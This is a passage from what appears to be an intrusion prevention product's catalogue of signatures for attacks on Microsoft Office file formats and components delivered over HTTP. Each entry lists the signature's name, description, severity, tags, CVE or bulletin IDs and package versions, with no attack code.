Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2004, Microsoft Excel 2002, MS2010-06, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel Viewer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-225-3038
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562

About this situation: A malicious Microsoft Excel document targeting CVE-2010-2562 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-328-4219
Vulnerability: Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0822 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-319-4219
Vulnerability: Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Object-Record-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-245-3038
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Office-Excel-Object-Record-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2010-06, CVE2010, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel Viewer detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129

About this situation: A malicious Microsoft Excel document targeting CVE-2009-3129 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-265-3038
Last changed: sgpkg-ips-371-4219
Vulnerability: Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134

About this situation: A malicious Microsoft Excel document targeting CVE-2009-3134 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-265-3038
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-String-Variable-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2010-06, CVE2010, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Office-Excel-String-Variable-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Sxdb-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Open XML File Format Converter, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Microsoft-Office-Excel-Sxdb-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-SxView-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel Viewer, Microsoft Office, Microsoft Office Compatibility Pack, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Microsoft-Office-Excel-SxView-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245

About this situation: A malicious Microsoft Excel document targeting CVE-2010-1245 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-322-4219
Vulnerability: Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Open XML File Format Converter, Microsoft Office Compatibility Pack, MS2010-10, CVE2010, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Open XML File Format Converter, Microsoft Office Compatibility Pack, MS2009-06, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0824 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-320-4219
Vulnerability: Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
Description:
Back to top

HTTP_SS-Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-363-4219
Last changed: sgpkg-ips-363-4219
Vulnerability: Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951
Description:
Back to top

HTTP_SS-Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Jet Engine (msjet40.dll) detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Jet Engine, MS2008-05, CVE2007, Windows not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Office-MSO-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2004, MS2010-02, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-281-4219
Vulnerability: Microsoft-Office-MSO-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2004, Microsoft Office 2008, MS2010-11, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Vulnerability: Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336
Description:
Back to top

HTTP_SS-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service

About this situation: Denial of service exploit against the Microsoft Office 2003 DataSourceControl ActiveX control detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Office, Windows not specific, Microsoft Office not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service
Description:
Back to top

HTTP_SS-Microsoft-Office-OneNote-Url-Validation-Error

About this situation: An attempt to exploit URL validation vulnerability in Microsoft Office OneNote detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office OneNote, Microsoft Office 2003, MS2008-09, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-167-2032
Vulnerability: Microsoft-Office-OneNote-Url-Validation-Error-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office Outlook detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, Microsoft Office, MS2008-03, CVE2008, Windows not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-Pict-Image-Converter-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office Converter Pack, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Microsoft-Office-Pict-Image-Converter-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-2573 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-11, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Vulnerability: Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
Description:
Back to top

HTTP_SS-Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-2572 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-11, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Vulnerability: Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
Description:
Back to top

HTTP_SS-Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, Microsoft Office, Microsoft Office 2004, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0031 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-281-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
Description:
Back to top

HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0032 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-332-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
Description:
Back to top

HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0033 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-371-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
Description:
Back to top

HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0034 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-282-4219
Last changed: sgpkg-ips-282-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
Description:
Back to top

HTTP_SS-Microsoft-Office-Publisher-Invalid-Memory-Reference

About this situation: An attempt to exploit a vulnerability in Microsoft Publisher detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Publisher, MS2008-02, CVE2008, Windows not specific, Microsoft Office not specific, Microsoft Publisher not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Office-Publisher-Invalid-Memory-Reference
Description:
Back to top

HTTP_SS-Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004, Microsoft Office 2007, Microsoft Office 2008, Microsoft Office 2010, MS2010-11, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Vulnerability: Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333
Description:
Back to top

HTTP_SS-Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in Microsoft Office Text Convertor over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2009-04, CVE2009, Windows not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-246-3038
Vulnerability: Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2007, Microsoft Office 2010, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-363-4219
Last changed: sgpkg-ips-363-4219
Vulnerability: Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947
Description:
Back to top

HTTP_SS-Microsoft-Office-Web-Components-2-MS09-043

About this situation: Detects the use of a vulnerable OWC component
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Microsoft-Office-Web-Components-2-MS09-043
Description:
Back to top

HTTP_SS-Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136

About this situation: An attempt to exploit a vulnerability in Microsoft Office Web Components detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office Web Components, Microsoft Office 2003, MS2009-08, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-230-3038
Last changed: sgpkg-ips-231-3038
Vulnerability: Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
Description:
Back to top

HTTP_SS-Microsoft-Office-Web-Components-Code-Execution-Exploit-MS09-043

About this situation: An exploit against a vulnerability in Microsoft Office Web Components detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office Web Components, Microsoft Office 2003, MS2009-08, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-238-3038
Vulnerability: Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
Description:
Back to top

HTTP_SS-Microsoft-Office-Web-Components-Datasource-Code-Execution

About this situation: An attempt to exploit a file creation vulnerability in Microsoft Web Components Control ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office Web Components, MS2008-03, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Microsoft-Office-Web-Components-Datasource-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-Web-Components-MS09-043

About this situation: Detects the use of a vulnerable OWC component
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-238-3038
Vulnerability: Microsoft-Office-Web-Components-MS09-043
Description:
Back to top

HTTP_SS-Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Visual Studio .NET, Microsoft BizTalk Server, Microsoft Office, Microsoft Commerce Server, Microsoft Internet Security and Acceleration Server, MS2008-03, CVE2006, Any Operating System not specific, Microsoft Visual Studio .NET not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Word detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2009-11, CVE2009, Windows not specific, Microsoft Word not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office Compatibility Pack detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Word, Microsoft Office 2004, Microsoft Works, Microsoft Office 2008, Microsoft Open XML File Format Converter, Microsoft Office Compatibility Pack, MS2010-08, CVE2010, Any Operating System not specific, Microsoft Word not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-400-4219
Vulnerability: Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office Converter Pack detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Microsoft Office Converter Pack, MS2009-04, CVE2009, Windows not specific, Microsoft Word not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-OLE-Automation-Heap-Overrun

About this situation: An attempt to exploit a vulnerability in Microsoft OLE Automation detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows Vista, Any Hardware, MS2008-02, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-167-2032
Vulnerability: Microsoft-Windows-OLE-Automation-Heap-Overrun
Description:
Back to top

HTTP_SS-Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-06, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
Description:
Back to top

HTTP_SS-Microsoft-OLE-Structured-Storage-Excessive-SAT-Size

About this situation: Detected a download of a suspicious OLE Structured Storage file
Context: HTTP Server Stream
Severity: 7
